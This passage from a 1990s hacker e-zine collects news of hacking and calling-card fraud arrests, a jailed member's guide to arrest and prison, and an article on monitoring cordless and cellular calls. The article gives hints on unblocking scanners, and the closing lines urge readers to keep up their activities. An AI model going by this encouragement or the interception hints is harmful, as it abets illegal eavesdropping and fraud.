  742. Three Colorado teen-agers are suspected of setting up an elaborate computer-
  743. hacking system that tapped into a long-distance telephone company and stole 
  744. secret access codes (k0dez!).
  745.  
  746. Police arrested Kevin Wilson (Damian), 18, of the 7400 block of South Gallup
  747. Street in Littleton, and two juveniles (Epsilon and Shockwave) from Jefferson
  748. County in the alleged scheme.
  749.  
  750. =-=
  751.  
  752. "INTERVIEW WITH A CRYPTKEEPER"
  753.  
  754. ck: I only got busted last February (1994) for hacking
  755.  
  756. dis: I heard you got hit twice.. once last year, and once a lot more
  757.      +recently..
  758.  
  759. CK: nope, I moved, I didn't get busted. I only got busted last year,
  760.     once, that's it. And it wasn't real serious.. not like cellphone/money
  761.     laundering..just some inet hacking. I got busted for hacking the
  762.     University of Cincinnati and a few other things on the net.. they
  763.     traced me through a PBX.. they were serious. They thought I was 
  764.     a spy. they were pissed to find out I was just a 16 year old.
  765.  
  766. dis: hmm... bad.. did they just search/seize or what?
  767.  
  768. ck: search/seized my computer.. I eventually got most of my stuff back
  769.     (the computer, monitor, and keyboard) and had to spend 10 days in 
  770.     juvenile thats about it.  oh.. and a big pain in the ass too of
  771.     course not bad at all..
  772.  
  773. dis: anything else?
  774.  
  775. ck: and tell them I was only busted ONCE, and it wasn't all that serious.
  776.     I don't have any plans to get back into the scene (it sux now), but
  777.     I do enjoy hearing about it sometimes.
  778.  
  779. =-=
  780.  
  781. "FEDZ CATCHING ON TO CALLING CARD SKAMS"
  782.  
  783.          A $50 million telephone calling-card theft ring disclosed
  784. earlier this week by federal investigators is representative of the advanced
  785. types of scams that have emerged in the last two years as telephone companies
  786. have become better at ferreting out fraud.
  787.  
  788. The Secret Service said Ivy James Lay, a switch engineer at MCI's network
  789. center in Charlotte, N.C., stole over 60,000 calling card numbers from MCI
  790. and other long distance companies, later selling them to 'band of computer 
  791. hackers.' The estimated value of the cards lies near $50 million. The
  792. Secret Service (which investigates fraud like this) claims this to be the
  793. largest case of calling card theft to date.
  794.  
  795. =-=-=
  796.  
  797. "SOME OF THE INTERESTING FACTS FROM A NEWSPAPER ARTICLE"
  798.  
  799. Two computer hackers have been sentenced to fed. prison and an accomplice in
  800. Mn. awaits sentencing for his part in an international phone conspiracy.
  801. Ivey James Lay of Haw River, N.C., and Frank Ronald Stanton of Cary, N.C., 
  802. were part of a hacker ring that stole credit-card numbers from MCI's
  803. Computer terminal in Greensboro. A third member of the ring, Leroy James
  804. Anderson, of Minneapolis pleaded guilty Friday in Minnesota to federal
  805. copyright violations.
  806.  
  807. US District Court Judge James Beaty on Fri. sentenced Lay to tree years 
  808. and two months in prison. Stanton, a 22-year-old student at Wingate College,
  809. was sentenced to one year. Anderson's sentencing is expected this summer.
  810.  
  811. The conspiracy stretched into several European countries and cost long-
  812. distance carriers more than $28 millon, authorities said. 
  813.  
  814. Lay and Stanton pleaded guilty in Jan. to charges of fraud and trafficking
  815. in unauthorized access devices. The group bought and sold at least 50,000
  816. numbers from 1992 until the summer of 1994, according to court documents.
  817.  
  818. "What I did was very stupid," Stanton told Judge Beaty at his sentencing.
  819. "I'd like to go back and finish college."
  820.  
  821. =-=-=
  822.  
  823. "SHOCKER[303] GETS NAILED FOR CC'S"
  824.  
  825. Damn, I got busted w/an illegal line tap! FUCK. No jail, just major phone
  826. bills! They are gunna try to bust me w/Credit Card fraud too. I shoulda
  827. listened to you. Fuck me. Got my mac taken away, I am writing this from a
  828. friends, I am not supposed to be here either, but hell, I got everything taken
  829. away, life sux shit, so do the gawd damn cops. Anyways, um, I'll see what
  830. happens, I'll call you sometime if I can get to the phone w/out my parents
  831. knowing. I can't have anything back until I pay for this shit, I think it is
  832. between $400 and $500, not sure, I already paid $170, but then I hafta
  833. fucking pay for MY PARENTS phone bill too, I rung the fuck outta that too. I
  834. got like, a felony and a second degree misdemeanor for that shit, they
  835. will drop the felony to a misdemeanor tho, I got charged with 'Theft' (felony)
  836. and criminal tampering (2nd degree misd.) SHIT TO HELL! Damnit. Anys, um, I'll
  837. see ya ok? Bye..
  838.  
  839. =-=-=
  840.  
  841. "NYHE RUMORS"
  842.  
  843. The New York Hack Exchange got busted for scams and cellfonez...
  844.  
  845. (Someone mail me with more than a rumor please)
  846.  
  847. =-=-=
  848.  
  849. "WAREZ BOARD BUSTS AROUND THE COUNTRY"
  850.  
  851.                Bad Sector           [BUSTED!]
  852.                Beyond Corruption    [BUSTED!]
  853.                Jurrasic Park        [BUSTED!]
  854.                Lineup               [BUSTED!]
  855.                Main Frame           [BUSTED!]
  856.                Necronomicon         [BUSTED!]
  857.                No BBS               [BUSTED!]
  858.                The Notice           [BUSTED!]
  859.                On The World         [BUSTED!]
  860.                Perfect Crime        [BUSTED!]
  861.                Red Alert            [BUSTED!]
  862.                Restricted Area      [BUSTED!]
  863.                Rubbish Heap         [BUSTED!]
  864.                Skull Island         [BUSTED!]
  865.                Twins                [BUSTED!]
  866.                The Underworld       [BUSTED!]
  867.                Wolf Pack            [BUSTED!]
  868.      
  869. 15 Arrests          
  870. 75 RCMP Officers Involved
  871. Removed at least 11 BBSs in one day
  872. Seized more than $200,000 in computer hardware
  873. Operation/Investigation lasted 6 months to 1 year
  874. April 12, 1995
  875. Busts are localized in Montreal
  876. 514 NPA     
  877.      
  878. =-=-=
  879.  
  880. "DUTCH HACKER ARRESTED"
  881.  
  882. (from CUD 7.21):
  883.  
  884.             --------------Original message----------------
  885.  
  886. UTRECHT, THE NETHERLANDS, 1995 MAR 6 (NB) -- A Dutch student has
  887. become the first person to be convicted of computer hacking in the
  888. Netherlands. Ronald Oosteveen, a 22 year old Utrecht computer science
  889. student, was handed down a six month suspended sentence by
  890. magistrates last week, and was fined around $3,200
  891.  
  892. Oosteveen was accused of breaking into university, corporate and
  893. government computers, following his arrested in March, 1993, just
  894. three weeks after new Dutch anti-hacking legislation came into force.
  895.  
  896. Oosteveen was caught in the act of trying to hack into the computer
  897. lines of a technical university in Delft near The Hague. He is also
  898. thought to have been responsible for previous hacking attacks which
  899. occurred before the new legislation came into force.
  900.  
  901. =-=-=
  902.  
  903. "THE EAST COAST"
  904.  
  905. Tabas and Others Bust:
  906.  
  907. According to Gatsby, the following were busted: Himself, Mark Tabas
  908. KC, Dispater, St. Elmos, Zibby, Rudy, Dr Delam, and Phantom Phreaker.
  909.  
  910. (When I talked to him, he wasn't able to say much since it was the day
  911. after the bust)
  912.  
  913. From empire Times:
  914. February 22, 1995
  915.  
  916. One thing all the people have in common:  Southwestern Bell - or at the very
  917. least, the desire and ability to hack all the switches on the west coast.
  918.  
  919. According to those involved, it goes way beyond switches...
  920.  
  921. =-=-=
  922.  
  923. "THE LAMACCHIA CASE"
  924.  
  925. April 94:
  926.  
  927. BOSTON, MA ...A federal grand jury returned a felony indictment today 
  928. charging an MIT student in a computer fraud scheme resulting in the piracy of 
  929. an estimated million dollars in business and entertainment computer software.
  930.  
  931. United States Attorney Donald K. Stern and FBI Special Agent In 
  932. Charge Richard Swenson announced today that DAVID LAMACCHIA, age 20,
  933. currently a junior at the Massachusetts Institute of Technology, was charged
  934. in a one count felony indictment with conspiring to commit wire fraud.  The 
  935. indictment charges that between November 21, 1993 and January 5, 1994
  936. LAMACCHIA operated a computer bulletin board service that permitted users
  937. to copy copyrighted business and entertainment software without paying to
  938. purchase the software.  The bulletin board was operated without authorization 
  939. on MIT computer work stations and was accessible to users worldwide over the
  940. Internet...  [Losses] are estimated to exceed a million dollars. [bahaha]
  941.  
  942. =-=-=
  943.  
  944. "BRITISH CALLING CARD BUST"
  945.  
  946. British students have taken part in an alleged ú65m computer fraud,
  947. involving the electronic theft of cards that allow users to make free
  948. telephone calls around the world.
  949.  
  950. The hackers, one of whom was only 17 years old, were said to be earning
  951. thousands of pounds a month selling cards...  Police found one teenager 
  952. driving a new ú20,000 car and with computer equipment worth ú29,000 in his
  953. bedroom.
  954.  
  955. AT&T officials also found a computer noticeboard called "Living Chaos"
  956. that was being used to sell the cards for up to ú30 each.  It mentioned
  957. Andy Gaspard, an employee of the Cleartel telephone company in
  958. Washington, whose home was raided.  "We found 61,500 stolen cards ready
  959. to be sent to Britain," said Eric Watley, a secret service agent in the city.
  960.  
  961. (The Sunday Times, 12 February 1995)
  962.  
  963. =-=
  964.  
  965. "TNO BUST OF 1994 - NEW NEWS"
  966.  
  967. (my comments in [ ])
  968.  
  969.                           ROCKY MOUNTAIN NEWS
  970. (Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995)
  971.         Quartet accused of hacking into Arapahoe college's system, 
  972.                         inciting illegal acts.
  973.  
  974. ---------------------------------------------------------------------------
  975. (Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran)
  976. Suspects used equipment at college to incite criminal acts, officials say.
  977.  
  978. Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!] 
  979. allegedly gained access to the Arapahoe Community College computer and 
  980. used it to distribute tips on how to commit crimes.
  981.         One man operated a computer bulletin board on which contributors
  982. from throughout the world exchanged how-to information on crimes ranging
  983. from credit-card fraud to high-tech burglary, authorities said. [Of course
  984. they fail to make that distinguishing gap that this board was NOT run off
  985. the Arapahoe system, and that it was a private BBS run out of his house]
  986.         Computers were seized from the homes of four hackers, ranging in
  987. age from 15 to 21.  Secret Service experts were called in to help crack
  988. the computer files. ['type filename.txt' is hard to crack eh?]
  989.         Investigators found software for breaking passwords, lists of 
  990. private passwords for several computer systems, instructions for cellular
  991. telephone fraud, private credit reports [Plural? Nope], lists of credit-card 
  992. numbers and electronic manuals on how to make bombs and illegal drugs.
  993. [Yes, WE did the oklahoma bombing!@$!]
  994.         In a 97-page affidavit detailing the 18-month investigation,
  995. investigator John Davis of the Arapahoe district attorney's office said
  996. that the hackers "operate with an attitude of indifference to the rights
  997. and privacy of others and have made efforts to teach and involve others in
  998. their criminal enterprise." [What the fuck does the government do everyday?]
  999.         At the home of a Denver juvenile, authorities found hazardous 
  1000. chemicals and a book on how to make bombs.
  1001.         Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19,
  1002. of Thornton, were charged last month with committing computer crimes and
  1003. conspiracy.  Both are scheduled to appear in Arapahoe County Court on July
  1004. 5.
  1005.         A decision is pending on whether to charge a 15-year-old Highlands
  1006. Ranch youth and a 17-year-old Denver resident, chief deputy district
  1007. attorney John Jordan said Friday.
  1008.         The affidavit says Papadenis, Jackson, and the youths hacked into
  1009. the Arapahoe County Community College computer system, then used it to
  1010. illegally distribute copyrighted computer games [Sorry, TNo doesn't have 
  1011. a warez division yet] and electronic magazines promoting fraud, theft, 
  1012. burglary and money-laundering.
  1013.         One of the magazines stated, "This publication contains information
  1014. pertaining to illegal acts.  The use of this information is intended solely
  1015. for evil purposes." [Source: CoTNo 1!@#!@]
  1016.         Court documents do not indicate the hackers had political motives,
  1017. and authorities declined to comment on the case. [Hackers with political
  1018. motives would be way above their head.]
  1019.         A Denver University expert said computer criminals usually are not
  1020. motivated by ideology.  They usually are young people who are "doing it for
  1021. the sheer challenge of it - just to demonstrate that they're able to do it,"
  1022. said Don McCubbery, director for the center on electronic commerce at DU.
  1023.         McCubbery estimates that authorities learn of only 5% of computer
  1024. crimes.  He said computer security experts generally have difficulty
  1025. keeping up with the hackers. [No shit] 
  1026.  
  1027.             -----------------------------------------------            
  1028.             (Side note box)  THE NEW ORDER (Bullet listing)
  1029.  
  1030. Some accusations listed in court documents concerning The New Order group
  1031. of computer hackers:
  1032.         - A hacker from the United Kingdom offered suspect John Jackson
  1033.           a VISA card number with a $300,000 credit limit. [Tacos anyone?]
  1034.         - A computer seized from a Highlands Ranch home contained password
  1035.           files for computer systems at the University of Colorado
  1036.           at Boulder.
  1037.         - A note found in Jackson's home indicated his plans to hack into
  1038.           the Thornton Police Department computer. [Yes, they believe 
  1039.                                                     everything they read]
  1040.         - Jackson also had a computer file containing access information
  1041.           for Taco Bell and McDonald's computers.  [There goes national
  1042.                                                                security!]
  1043.  
  1044. =-=
  1045.  
  1046.         That is all for now. Not a good year by any means as you can tell,
  1047. especially considering who else may have been busted, that we didn't hear
  1048. about. Don't stop what you are doing though, just be more careful of
  1049. your activities. YOU are right, THEY are wrong.
  1050.  
  1051.  
  1052. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  1053.  
  1054.  
  1055.  
  1056.                  What Happens When You Get Caught
  1057.                  --------------------------------
  1058.           [A.K.A  The Hackers Guide to the Law and Prisons] 
  1059.           
  1060.                                 by
  1061.                   
  1062.             D. Fanning - A.K.A. John Falcon/Renegade - TNO
  1063.             
  1064.  
  1065. Well if you are reading this, that means you are either curious or shit 
  1066. happened and the law reared it's ugly head and they nabbed you.  Now what 
  1067. you are about to read is absolutely fucking true.  Why is this?  Because I 
  1068. am spending the next year or so in prison for hacking.  Now needless to 
  1069. say, I have already announced my retirement from the scene, but I still 
  1070. wanted to write and rant and rave about all the things that happen in this 
  1071. world and to clue you in on a quite a few things.
  1072.  
  1073. Let's start with the ground rules:
  1074.  
  1075. 1.  You cannot make a deal with a cop.  So when they start reading Miranda 
  1076.     rights, keep silent or just ask inconspicuous questions like "Where are we 
  1077.     going?", or the common ne, "What's going on here?  Why am I being charged?"
  1078.  
  1079.     Only a D.A. or someone in the lawyer capacity can make a deal.  If a 
  1080.     cop offers a deal, you are still going to get charged.  Cops cannot 
  1081.     make any exceptions on anyone.  So drop all ideas of such.
  1082.     
  1083. 2.  Do not narc on anyone when the questioning starts.  Your best bet would 
  1084.     be to just stay silent till the lawyer shows up or something.  Why?  
  1085.     Questioning wouldn't be done unless there were gaps in their 
  1086.     investigation.  What you want is as many of those as possible.  The 
  1087.     more you have, the better it will be when plea bargaining starts up.  
  1088.     At the very least though, lets say the they do convict you, the feds 
  1089.     and the court find you guilty or you plea that way and you are thrown 
  1090.     into the clink.  Guess who does your admissions paperwork? You guessed 
  1091.     it, the inmates.  Word has a way of coming around to dealing or giving 
  1092.     a very wide berth to those who do the narc thing  Key idea:  "If you 
  1093.     fall, don't bring others down too.  It just adds to the load on you."
  1094.     
  1095. 3.  During questioning, they will put on a lot of plays to make you talk, 
  1096.     they will offer you something to drink or something to make you feel 
  1097.     more comfortable.  Well why not?  Spend 60 cents and get your work done 
  1098.     for you by a confession.  Makes things nice and neat.  Don't fall for 
  1099.     it.  If you are thirsty, accept the drink and don't tell them shit.
  1100.     
  1101. 4.  They will also do some kind of powerplay on you.  They try to make you 
  1102.     think that they are doing you a favor, but in reality, you are digging 
  1103.     a deeper hole for yourself.
  1104.     
  1105. 5.  The idea of you being innocent until proven guilty has gone the way of 
  1106.     the do-do bird.  When a jury sees you, the first thought that comes to 
  1107.     mind is not if you are guilty or not, the question is HOW guilty you 
  1108.     are.  The way they see it, if you are not guilty, what are you doing 
  1109.     in front of them in the first  place?  The O.J. Simpson trial is a 
  1110.     perfect example.  Also, look how many cop shows are around the box.  
  1111.     That right there is a disgrace in my book.  First they have you on 
  1112.     film, second they pat each other on the back while you are in 
  1113.     misery.  Sick.
  1114.     
  1115. Well on with the show.  If they have already done an investigation on you 
  1116. and you don't hear from them in a while, the first natural reaction would 
  1117. be to relax and let your guard down.  WRONG ANSWER!  That means that some 
  1118. shit is really going to go down.  You should be extra careful and not 
  1119. talk about it to anyone.  Most likely they are looking for more evidence 
  1120. to make it harder on you in the long run, like a wiretap.  In the federal 
  1121. system, all you need is one person's permission to record a phone call.  
  1122. If you have to talk about it, use face to face contact and pat each other 
  1123. down to make sure there is no bug. For instance, when I was arrested I made
  1124. a fatal mistake and  talked about it to one of the co-defendants and he 
  1125. had cut a deal with the D.A. already.  My bacon was cooked when I heard 
  1126. my voice on a tape recording.
  1127.  
  1128. Well no matter what happens, sooner or later you will get nabbed so I won't
  1129. get into the details of this.  All I can suggest is that you really do 
  1130. what ever you can to get a real attorney.  P.D.'s are good for some 
  1131. things but they get their paycheck from the same place that nabbed you in 
  1132. the first place so don't let that fool you too much.  I will admit that 
  1133. it is better than nothing though.
  1134.  
  1135. Most likely for the computer hackers out there, they will charge you 
  1136. under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access 
  1137. Device.  This charge was mainly intended for credit cards but the D.A.'s 
  1138. have taken it to just about everything that involves computers or 
  1139. communications in general.
  1140.  
  1141. Now there are some landmark cases that have beat this into the ground.  
  1142. One of them being U.S. vs Brady which was a guy making satellite decoders 
  1143. with the stops pulled out of them.  He beat this due to the ruling that 
  1144. the signal was out there everywhere and that he merely just decoded the 
  1145. signal.  Therefore there was no actual loss, just potential loss which 
  1146. doesn't count.  Another one is U.S. vs McNutt in the 10th Circuit of 
  1147. Utah.  This guy made chips for cellular phones that would send different 
  1148. ESN/MIN pairs to the cell site that made it always seem like a new roamer 
  1149. every time he calls.  The cell site just goes ahead and gives him the call 
  1150. because it doesn't have time to verify if it is a valid MIN/ESN pair.  He 
  1151. won the case due to the same fact that there were no accountable loss 
  1152. because it never used or really billed any legit customer.
  1153.  
  1154. The flip side of that is being two weeks ago from when this was written, 
  1155. a guy was tried in LA for the exact same thing and was found guilty, 
  1156. appealed the case, won the appeal, then the government re-appealed it and 
  1157. he lost again.  This caused a split in the court circuits which means 
  1158. that this will got the Supreme Court.
  1159.  
  1160. Remember that the government or any government agency will not press any 
  1161. issue unless there is some kind of financial deal behind it because they 
  1162. are wasting time and resources on you when they can be getting Joe Blow 
  1163. Cartel Drug Dealer.
  1164.  
  1165. So they find you guilty or you plea.  The next step is the Pre-Sentence 
  1166. Investigation.  They basically take a fine tooth comb and find any dirt 
  1167. about you that they can.  You will be amazed about all the things they 
  1168. can do to make you seem like a threat to society, the American way of 
  1169. life, apple pie and all...  All you can do is make sure or try your 
  1170. hardest to make it clean as possible.  Now I got ripped hard on mine due 
  1171. to very strained relations with one of my parents and they managed to 
  1172. throw everything that anyone had ever said about me together to make it 
  1173. look like I was truly evil.  That is where the cops will come back and 
  1174. haunt you because everything you say will be in that report.  Every 
  1175. little action and all will be written with a slant of a cop.  (Needless to 
  1176. say who writes the report kids...  The U.S. Probation Office, a branch of 
  1177. the Secret Service and the F.B.I.)
  1178.  
  1179. Well you are convicted and here you are.  Depending on where you live,
  1180. you will either be bussed/vanned to the prison where they choose for
  1181. you or they will fly you there.  After you are sentenced you now belong 
  1182. to the Bureau of Prisons (A D.O.J. branch).  Basically you will be taken
  1183. to a county jail for holding while they classify you and then you get 
  1184. transported out.  When I was transported out, I was in shackles and all 
  1185. taking a ride on Fed Air.  The USM's have a fleet of 737's they confiscated
  1186. from drug busts and converted them into their own use.  You are basically 
  1187. bussed out to a unused or empty part of the airport and with a large ring of
  1188. USM's with shotguns in their hand, you get put onto an airplane and given a 
  1189. box lunch and off you go.  I went from Portland to Sacramento to Phoenix
  1190. in one day.  Spent the night at the FCI in Phoenix then the next morning 
  1191. from there to Lompoc where I am now.
  1192.  
  1193. Remember these words though... You are now property of the B.O.P.  Basically 
  1194. you are luggage, they can transport you at any time whenever they want to.
  1195. But, depending on where you go, it isn't all that bad.  Most likely you will 
  1196. meet friends or acquaintances that will help you along.  Just ask a few 
  1197. questions and usually they will know.  One thing to never do is be secretive
  1198. about why you are there.  You are there, most likely someone else is there 
  1199. for the same thing and you can get a strong fellowship going with people
  1200. in the same predicament.
  1201.  
  1202. One thing to always keep in mind from now to eternity, no matter where you go.
  1203. The feds are nailing everyone for 'Conspiracy'.  It's a damn shame when 
  1204. you go to a place where 90 percent of the inmate population is here on some
  1205. kind of drug related charge and of that 90%, 35% are here on conspiracy 
  1206. related charges. Truly something to think about.
  1207.  
  1208. Now for the hackers and phreakers that are facing jail.  If your PSI report
  1209. even breaths any mention of some kind of use with the computer, you will be 
  1210. banned from that.  3 days ago I was given a list of direct orders to avoid
  1211. all contact of that.  Likewise, they put a restriction on the levels of
  1212. computer related material that I can read.  Usually you can get any
  1213. periodical you want except for things that deal with gay man on man stuff.
  1214. Just like the gay people feel, that smells of discrimination but that's
  1215. just the way it is.
  1216.  
  1217. Phones are something else that you will wish that changes real quick.  The 
  1218. phones are run by a B.O.P. thing called ITS-Inmate Telephone Services. 
  1219. Basically it's a Unix run PBX that limits the people you can call and it 
  1220. throws the bill on you.  No more collect calls or anything of that nature.
  1221. Just doesn't happen.  But the inmates have won a Class action suit against
  1222. the B.O.P. about this and the government right now is appealing it.
  1223. Technically with a suit or even an appeal, you have to implement it 
  1224. as soon as you can after the judgement is made.  But it's been a year 
  1225. since they won it and nothing changes.  Basically it's the government stalling.
  1226.  
  1227. Well that's all for me to say this time around.  Remember to keep the dream 
  1228. alive and judge for yourself with that piece of gray matter between your 
  1229. ears.
  1230.  
  1231. You can write any comments to me at:
  1232. Fanning
  1233. Reg No. 12617-006
  1234. 3600 Guard Road
  1235. Lompoc, CA 93436
  1236.  
  1237. or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net
  1238. (I prefer the first method to save my friends postage costs.)
  1239.  
  1240. Keep it strong - TNO (The New Order)
  1241.  
  1242. John Falcon - Ex-TNo
  1243. 1981-1994
  1244.  
  1245.  
  1246. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  1247.  
  1248.  
  1249.  
  1250.           --- Legal and Technical Aspects of RF Monitoring ---
  1251.  
  1252.                             --- Major [TNo] ---
  1253.  
  1254.  
  1255.  
  1256. SYNOPSIS
  1257. --------
  1258. The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article 
  1259. doubtlessly sparked an interest in cordless phone monitoring.  Wireless 
  1260. telephones are a prime target for monitoring.  Both cordless and cellular 
  1261. telephones are nothing more than radio transceivers that, at some point, 
  1262. interface with the telephone system.  This article will seek to expand on 
  1263. and clarify some points made in "Cordless Fun", and also to point to some 
  1264. other areas of interest.
  1265.  
  1266. =============================================================================
  1267.  
  1268.  
  1269. CORDLESS
  1270. --------
  1271. Legal Stuff:
  1272. Monitoring cordless phones is now a federal crime!  Recent legislation 
  1273. prohibits listening in on cordless phones, much the same as cellular phones.
  1274. Also, the Communications Act of 1934 makes it a crime to divulge
  1275. anything you monitor to another person.  It is also illegal to use anything 
  1276. that you hear for personal gain.  Note that this applies to anything that you 
  1277. monitor, not just cordless phones.  Alternatively, there are presently no 
  1278. restrictions on scanners that are capable of receiving cordless phone 
  1279. frequencies.  However, I suspect that in the near future the feds will deny 
  1280. certification to such scanners, as they did with scanners that could receive 
  1281. cellular frequencies.
  1282.  
  1283. Technical Stuff:
  1284. Cordless telephones transmit and receive with very low power.  This is 
  1285. primarily to minimize interference with other nearby cordless telephones.  
  1286. This makes scanning for cordless telephones a short-range endeavor.  Most 
  1287. cordless phones of recent manufacture operate in the 46-49MHz range.  
  1288. However, the FCC has recently opened up a part of the 900MHz spectrum for 
  1289. cordless telephone usage.  The new 900MHz phones often offer greater range 
  1290. and increased clarity.  There are also models sporting "spread-spectrum" 
  1291. technology, which makes monitoring with conventional scanning-receivers a 
  1292. virtual impossibility.  Another security measure on some cordless phones
  1293. involves encoding the DTMF tones sent from the handset to the base.  This 
  1294. prevents the base from accepting tones from other, unauthorized, handsets.  
  1295. It does not hinder monitoring the calls, but the DTMF tones will not be 
  1296. recognizable.  In the 46-49MHz phones, there are ten frequency pairs 
  1297. available.  Many older phones only utilize one pair.  Newer, more expensive,
  1298. phones can utilize all ten pairs.  Some automatically search for an open 
  1299. channel, while others can be manually manipulated to find a channel with less 
  1300. noise.  Likewise, the new 900MHz phones will scan to find a clear channel.  
  1301.  
  1302.  
  1303. CELLULAR
  1304. --------
  1305. Legal Stuff:
  1306. Intercepting cellular mobile telephone (CMT) traffic is illegal.  The 
  1307. Electronic Communications Privacy Act of 1986 made it so.  Scanners that 
  1308. receive the CMT portion of the 800MHz range may no longer be manufactured, 
  1309. sold, or imported into the U.S.  Many scanners were designed to scan this 
  1310. area, though.  When the Cellular Telephone Industry Association began 
  1311. complaining about this fact, most scanner manufacturers/resalers voluntarily
  1312. "blocked" the cellular freqs from their scanners.  This pacified the CTIA for 
  1313. a while, but the "blocks" were easily hackable.  Typically, restoring a 
  1314. "blocked" scanner involved removing a single diode, a ten minute job for even 
  1315. the most devout technophobe.  This fact led to the passage of the Telephone 
  1316. Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C. 
  1317. certification of scanners that receive cellular freqs, or those which may be 
  1318. easily modified to do so.  New scanners will be "blocked" at the CPU, and
  1319. hacking them is unlikely.  Frequency converters offered another means of 
  1320. monitoring cellular and other 800MHz traffic.  Essentially, a converter 
  1321. receives an 800MHz signal, and converts it to a 400MHz signal that the scanner 
  1322. is capable of receiving.  Converters are useful for scanners that have no 
  1323. 800MHz reception capabilities, as well as those that have portions of the 
  1324. 800MHz band blocked.  Unfortunately, converters were also outlawed by the
  1325. TDDRA.  They are still legal in kit-form, however.  Another option would be 
  1326. to build one from scratch, which isn't an especially difficult project.  
  1327.  
  1328. Technical Stuff:
  1329. The word "cellular" defines the cellular phone system.  A service area is 
  1330. broken up into many small cells.  As a user travels through an area, his call 
  1331. will be handed off from one cell to the next.  This handoff is transparent to 
  1332. the user, but a monitor will lose the conversation.  Cellular phones use low 
  1333. power (a maximum of five watts) so that a cell phone will not attempt to seize 
  1334. more than one site at a time.  When a call is initiated by a cell phone, the
  1335. nearest site will respond, and assign an available frequency to the phone.  
  1336. When the user moves comes into range of the next site, the process repeats 
  1337. itself, and the new site will assign a new frequency.  Therefore, it can be 
  1338. difficult to track a particular conversation as it moves from site to site 
  1339. with a single scanner.  Every area served by cellular phones will have two 
  1340. service providers.  One will be the local RBOC, while the other will be a
  1341. cellular-only provider.  The two systems are designated as "A" and "B" 
  1342. systems, or "Wireline" and "Non-Wireline".  There is no difference between 
  1343. the two for monitoring purposes, but since "A" and "B" carriers use different 
  1344. frequencies, it should be possible to identify local cell-towers as being "A" 
  1345. or "B" sites.
  1346.  
  1347.  
  1348. PHONE PATCH
  1349. -----------
  1350. Legal Stuff:
  1351. The Communications Act of 1934 applies here as well, but there are no other 
  1352. prohibitions on monitoring business-band phone patches.
  1353.  
  1354. Technical Stuff:
  1355. Many business radio systems have the ability to tie into the phone
  1356. system.  Most of these systems will be found in 800MHz trunked
  1357. radio systems.  In a conventional radio system, one frequency will
  1358. equal one channel.  In a trunked system, however, frequencies and
  1359. channels are independent of each other.  The trunking computer will
  1360. assign a different frequency to a radio each time it transmits,
  1361. and it will send a signal to other radios on the same channel,
  1362. telling them the current frequency in use.  Phone patches are easy
  1363. to monitor, though.  Since the radio on a phone patch is
  1364. transmitting constantly, the frequency used will remain the same
  1365. for the duration of the conversation.  Many people mistakenly
  1366. believe these calls to be cellular, but they are not.  Most phone
  1367. patches found in 800MHz trunked systems will be full-duplex, just
  1368. like cellular and home phones.  Some systems, especially in UHF
  1369. (around 450MHz) and 800MHz conventional radio systems will only be
  1370. half-duplex, though.  In those systems, only one person call talk
  1371. at a time, just like normal two-way radios.  Radio systems are
  1372. typically designed to offer service to an entire metropolitan area,
  1373. so range is quite good.  The mobile radio will transmit its signal
  1374. to a strategically located "repeater", which then re-broadcasts the
  1375. signal with much more power.  So long as a scanner is within
  1376. reception range of the repeater output, monitoring will be possible
  1377. regardless of the location of the party transmitting.
  1378.  
  1379.  
  1380.  
  1381. EQUIPMENT
  1382. ----------
  1383. Legal Stuff:
  1384. Some states prohibit mobile use of scanners.  Also, it is illegal
  1385. to use a scanner in the commission of a crime.
  1386.  
  1387. Technical Stuff:
  1388. There is a scanner for every appetite.  What sort of monitoring
  1389. one wants to do will dictate which scanner one buys.  For someone
  1390. interested only in cordless phones, a ten-channel scanner with no
  1391. 800MHz coverage will be quite adequate, and much cheaper than a
  1392. more capable scanner.  For someone interested in cellular, a full-
  1393. coverage 800MHz scanner with a much greater frequency storage
  1394. capacity will be necessary.  Base, mobile or handheld?  Depends
  1395. entirely on how it will be used.  Modern scanners are programmable,
  1396. while older units require crystals.  For someone wanting to monitor
  1397. only a few channels (such as cordless phones, or the local police),
  1398. a crystal-controlled scanner would be adequate, and much cheaper. 
  1399. But for more serious and varied scanning, programmable units are
  1400. a necessity.  Models are available that store between 10 and 1000
  1401. channels.  Uniden/Bearcat and Realistic are the two most commonly
  1402. available brands in the U.S. (although Realistic isn't actually a
  1403. brand, just a label...Radio Shack scanners are all manufactured by
  1404. Uniden or GRE, depending on the model).  Because of the TDDRA, many
  1405. of the best scanners from the past several years are no longer
  1406. available, but watch for Hamfests (great electronic flea-
  1407. markets...inquire at your local ham radio/electronics store),
  1408. garage sales, etc.  There is nothing in the TDDRA or other current
  1409. legislation that prevents private parties from owning or selling
  1410. pre-TDDRA equipment.  Aside from the scanner itself, the next-most
  1411. important piece of equipment is the antenna.  Handheld scanners
  1412. will generally utilize an "all-band" rubber-duck antenna (a
  1413. flexible, rubberized antenna, between 8-14" in length), while base
  1414. units will have a telescoping metal whip antenna.  These antennas
  1415. are adequate for receiving strong, local signals, but more
  1416. discriminating monitors will demand more.  For base units, an all
  1417. band discone type antenna, mounted outside as high as practical,
  1418. will offer good, omnidirectional performance.  For those who only
  1419. want to monitor a particular band, it would be best to use an
  1420. antenna cut specifically for that band.  Likewise, for those
  1421. monitoring signals coming from one general direction, a directional
  1422. antenna will offer better performance than an omnidirectional unit. 
  1423. For mobile use, using an antenna mounted on the vehicle will
  1424. greatly improve reception.  
  1425.  
  1426.  
  1427. MISCELLANEOUS COMMUNICATIONS
  1428. ----------------------------
  1429. Voice-pagers can offer interesting monitoring.  While the data-
  1430. transmissions that send the signal to the proper pager are
  1431. proprietary digital signals (and as such, illegal to monitor or
  1432. decipher), the actual "voice messages" are transmitted "in the
  1433. clear".
  1434. Packet-radio is used by ham radio operators.  They have a vast
  1435. network of computer bbs's that operate independently of the phone
